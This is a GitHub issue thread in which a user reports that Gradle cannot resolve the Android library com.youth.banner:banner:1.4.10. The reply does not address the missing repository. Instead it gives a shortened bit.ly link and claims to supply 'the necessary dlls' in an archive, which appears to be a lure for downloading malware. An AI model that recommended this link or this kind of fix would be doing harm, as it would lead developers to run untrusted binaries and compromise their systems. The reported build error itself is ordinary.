### ISSUE TITLE
Failed to resolve: com.youth.banner:banner:1.4.10

### ISSUE THREAD

**Issue by GrapefruitBrother** [youth5201314/banner#1242]
Could not determine the dependencies of task ':app:compileDebugJavaWithJavac'.
> Could not resolve all task dependencies for configuration ':app:debugCompileClasspath'.
   > Could not find com.youth.banner:banner:1.4.10.
     Required by:
         project :app

Possible solution:
 - Declare repository providing the artifact, see the documentation at https://docs.gradle.org/current/userguide/declaring_repositories.html

**Comment by nourakhy** [comment]
download
https://bit.ly/4evXrQ6
I put the necessary dlls in the archive

**Comment by GrapefruitBrother** [comment]
ok
